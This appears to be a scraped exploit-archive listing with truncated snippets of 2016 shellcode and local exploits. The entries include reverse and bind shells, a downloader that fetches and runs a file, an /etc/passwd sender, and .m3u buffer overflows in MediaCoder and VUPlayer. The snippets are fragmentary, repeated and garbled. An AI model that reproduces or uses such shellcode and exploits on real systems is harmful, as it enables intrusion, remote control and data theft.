Internet Bug Bounty: Adobe Flash Player PSDK Class Use After Free Vulnerability

I. Summary Adobe Flash Player is prone to a vulnerability which leads to Use After Free. Since the release condition is highly controllable, it is feasible to build a fully working exploit for shellcode execution with proper AS3 object occupied the original PSDK memory...

Linux/x86 - Reverse Shell using Xterm ///usr/bin/xterm -display 127.1.1.1:10 Shellcode (68 bytes)

/ Title : Linux , Reverse Shell using Xterm , ///usr/bin/xterm -display 127.1.1.1:10 Date : 12-07-2016 Author : RTV Tested On : Ubuntu x86 shellcode :...

Windows x86 URLDownloadToFileA+SetFileAttributesA+WinExec+ExitProcess Shellcode

Windows x86 URLDownloadToFileA+SetFileAttributesA+WinExec+ExitProcess Shellcode. Shellcode exploit for win32 platform / Title : Windows x86 URLDownloadToFileA+SetFileAttributesA+WinExec+ExitProcess shellcode Date : 12-07-2016 Author : Roziul Hasan Khan Shifat Tested on: Windows 7 x86 / /...

Windows/x86 - URLDownloadToFileA() + SetFileAttributesA() + WinExec() + ExitProcess() Shellcode (394

/ Title : Windows x86 URLDownloadToFileA+SetFileAttributesA+WinExec+ExitProcess shellcode Date : 12-07-2016 Author : Roziul Hasan Khan Shifat Tested on: Windows 7 x86 / / Disassembly of section .text: 00000000 : 0: 31 c9 xor %ecx,%ecx 2: 64 8b 41 30 mov %fs:0x30%ecx,%eax 6: 8b 40 0c mov...

Linux x86 TCP Reverse Shellcode - 75 bytes

Linux x86 TCP Reverse Shellcode - 75 bytes. Shellcode exploit for linx86 platform / Linux x86 TCP Reverse Shellcode 75 bytes Author: sajith Tested on: i686 GNU/Linux Shellcode Length: 75 SLAE - 750 ------------c prog ---poc by sajith shetty---------- include include include include int mainvoid i...

Linux/x86 - TCP Reverse Shellcode (75 bytes)

/ Linux x86 TCP Reverse Shellcode 75 bytes Author: sajith Tested on: i686 GNU/Linux Shellcode Length: 75 SLAE - 750 ------------c prog ---poc by sajith shetty---------- include include include include int mainvoid int sockfiledes; struct sockaddrin sockad; //1 create socket connection //Man page:...

Linux/x86-64 - Ncat Shellcode (SSL, MultiChannel, Persistant, Fork, IPv4/6, Password) (176 bytes)

include include // Exploit Title: Linux 64bit Ncat + SSL + MultiChannel + Persistant + Fork + IPv4/6 + Password 176byte // Date: 7/5/2016 // Exploit Author: CripSlick // Tested on: Kali 2.0 // Version: Ncat: Version 7.01 // email protected // OffSec ID: OS-20614 // http://50.112.22.183/...

Linux/x86-64 - Ncat Shellcode (SSL, MultiChannel, Persistant, Fork, IPv4/6, Password) (176 bytes)

include include // Exploit Title: Linux 64bit Ncat + SSL + MultiChannel + Persistant + Fork + IPv4/6 + Password 176byte // Date: 7/5/2016 // Exploit Author: CripSlick // Tested on: Kali 2.0 // Version: Ncat: Version 7.01 // email protected // OffSec ID: OS-20614 // http://50.112.22.183/...

Linux 64bit Ncat Shellcode SSL, MultiChannel, Persistant, Fork, IPv4/6, Password - 176 bytes

Linux 64bit Ncat Shellcode SSL, MultiChannel, Persistant, Fork, IPv4/6, Password - 176 bytes. Shellcode exploit for linx86-64 platform include include // Exploit Title: Linux 64bit Ncat + SSL + MultiChannel + Persistant + Fork + IPv4/6 + Password 176byte // Date: 7/5/2016 // Exploit Author:...

Linux x86 TCP Bind Shell Port 4444 - 98 bytes

Linux x86 TCP Bind Shell Port 4444 - 98 bytes. Shellcode exploit for linx86 platform / Linux x86 TCP Bind Shell Port 4444 98 bytes Author: sajith Tested on: i686 GNU/Linux Shellcode Length: 98 SLAE - 750 ------------c prog ---poc by sajith shetty---------- include include include include include...

Linux 64bit NetCat Bind Shell Shellcode - 64 bytes

Linux 64bit NetCat Bind Shell Shellcode - 64 bytes. Shellcode exploit for linx86-64 platform include include // Exploit Title: NetCat Bind Shell 64bit 64byte // Date: 6/28/2016 // Exploit Author: CripSlick // Tested on: Kali 2.0 // Version: v1.10-41 // [email protected] // OffSec ID:...

Linux/x86-64 - NetCat Bind Shell Shellcode (64 bytes)

include include // Exploit Title: NetCat Bind Shell 64bit 64byte // Date: 6/28/2016 // Exploit Author: CripSlick // Tested on: Kali 2.0 // Version: v1.10-41 // email protected // OffSec ID: OS-20614 // Victim: netstat -an | grep LISTEN | grep tcp // Attacker: nc unsigned char code = \ define PORT...

Linux x86_64 /etc/passwd File Sender Shellcode

Linux x8664 /etc/passwd File Sender Shellcode. Shellcode exploit for linx86-64 platform / Title : Linux x8664 /etc/passwd file sender shellcode Date : 28-06-2016 Author : Roziul Hasan Khan Shifat Tested On : Ubuntu 14.04 LTS x8664 / / Disassembly of section .text: 0000000000400080 : 400080: 48 31...

Linux/x86-64 - /etc/passwd File Sender Shellcode (164 bytes)

/ Title : Linux x8664 /etc/passwd file sender shellcode Date : 28-06-2016 Author : Roziul Hasan Khan Shifat Tested On : Ubuntu 14.04 LTS x8664 / / Disassembly of section .text: 0000000000400080 : 400080: 48 31 c0 xor %rax,%rax 400083: b0 39 mov $0x39,%al 400085: 0f 05 syscall 400087: 99 cltd...

Mediacoder 0.8.43.5830 - '.m3u' Buffer Overflow SEH Exploit

Exploit for windows platform in category local exploits !/usr/bin/python Exploit Title: Mediacoder 0.8.43.5830 - Buffer Overflow SEH Exploit .m3u Date: 25-June-2016 Exploit Author: Sibusiso Sishi Email: sibusiso at IronSky dot co.za Vendor Homepage: http://www.mediacoderhq.com/ Software Link:...

Linux/x86 - /bin/sh Shellcode + ASLR Bruteforce

/bin/sh shellcode Ubuntu 14.0.4 32 bit + ASLR Bruteforce shellcodeandaslrbruteforce.c Tested on : Ubuntu 14.04 32 bits Author : Pawan Lal email protected vim shellcodeandaslrbruteforce.c include include include include void vuln const char arg char buffer100; strcpybuffer, arg; printf"Hello %s\n"...

VUPlayer 2.49 (Windows 7) - '.m3u' Local Buffer Overflow (DEP Bypass)

!/usr/bin/env python Exploit Title: VUPlayer =2.49 .M3u Buffer overflow exploit with DEP bypass Date: 26-06-2016 Exploit Author: secfigo Vendor Homepage: http://vuplayer.com/ Software Link: https://www.exploit-db.com/apps/39adeb7fa4711cd1cac8702fb163ded5-vuplayersetup.exe Version: VUPlayer =2.49...

Linux x86 /bin/sh Shellcode + ASLR Bruteforce

Linux x86 /bin/sh Shellcode + ASLR Bruteforce. Shellcode exploit for linx86 platform /bin/sh shellcode Ubuntu 14.0.4 32 bit + ASLR Bruteforce shellcodeandaslrbruteforce.c Tested on : Ubuntu 14.04 32 bits Author : Pawan Lal [email protected] vim shellcodeandaslrbruteforce.c include include inclu...

PInfo 0.6.9-5.1 - Local Buffer Overflow

Exploit for linux platform in category local exploits Program affected: PInfo - File viewer Version: 0.6.9-5.1 Tested and developed under: Kali Linux 2.0 x86 - https://www.kali.org Program description: An alternative info-file viewer pinfo is an viewer for Info documents, which is based on ncurse...

VUPlayer 2.49 - '.m3u' Buffer Overflow (Win 7 DEP Bypass)

Exploit for windows platform in category local exploits !/usr/bin/env python Exploit Title: VUPlayer =2.49 .M3u Buffer overflow exploit with DEP bypass Date: 26-06-2016 Exploit Author: secfigo Vendor Homepage: http://vuplayer.com/ Software Link:...